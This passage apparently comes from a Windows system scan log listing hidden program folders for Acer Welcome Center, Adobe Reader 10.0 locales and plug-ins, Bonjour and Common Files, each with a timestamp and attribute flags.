[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item33\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item34\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item40\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item60\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item61\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item901\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item903\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item990\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\MyWinLocker\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Nero9\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Office2007\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Photoshop8\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90-85\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\Works90SE\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Acer
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Black
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Blue
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\eMachines
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gateway
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Generic
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Gray
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Green
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\IMG\_Btn\Packard Bell
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates
[2014/04/08 15:27:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Javascripts
[2015/09/07 23:07:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Tracker
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DAN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\DEU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ENU
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ESP
[2012/06/20 12:06:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\EUQ
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\HUN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\ITA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\JPN
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\KOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NLD
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\POL
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SLV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SUO
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\IDTemplates\UKR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES
[2015/09/07 23:07:30 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI
[2015/09/07 23:07:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR
[2015/09/07 23:07:29 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN
[2015/09/07 23:07:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ca_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\cs_CZ\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\da_DK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\de_DE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\es_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\eu_ES\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fi_FI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\fr_FR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hr_HR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\hu_HU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\it_IT\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ja_JP\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ko_KR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nb_NO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\nl_NL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pl_PL\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\pt_BR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ro_RO\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\ru_RU\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sk_SK\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sl_SI\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\sv_SE\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\tr_TR\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\uk_UA\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_CN\Services
[2014/09/21 04:52:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Locale\zh_TW\Services
[2014/05/21 23:03:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations
[2014/05/21 23:03:52 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\AcroForm\PMP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CAT
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHS
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CHT
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\CZE
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DAN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\DEU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ENU
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ESP
[2012/06/20 12:06:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\EUQ
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\FRA
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HRV
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\HUN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\ITA
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\JPN
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\KOR
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NLD
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\NOR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\POL
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\PTB
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUM
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\RUS
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SKY
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SLV
[2012/06/20 12:06:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SUO
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\SVE
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\TUR
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Annotations\Stamps\UKR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_CZE
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HRV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_HUN
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUM
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_RUS
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SKY
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_SLV
[2015/09/07 23:07:05 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_TUR
[2015/09/07 23:07:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins\Multimedia\MPP_UKR
[2012/06/20 12:06:33 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\plug_ins3d\prc
[2012/06/20 12:06:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\CIDFont
[2012/06/20 12:06:37 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\SaslPrep
[2012/06/20 12:07:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\Linguistics\LanguageNames2
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings
[2012/06/20 12:06:42 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Adobe
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\Mac
[2012/06/20 12:06:41 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Adobe\Reader 10.0\Resource\TypeSupport\Unicode\Mappings\win
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\da.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\de.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\en_GB.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\es.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fi.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\fr.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\it.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ja.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ko.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nb.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\nl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pl.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\pt_PT.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\ru.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\sv.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_CN.lproj
[2014/06/04 01:33:38 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Bonjour\Bonjour.Resources\zh_TW.lproj
[2015/02/05 17:58:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller
[2012/06/20 11:57:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation
[2014/04/23 18:34:35 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Resources\WebKit
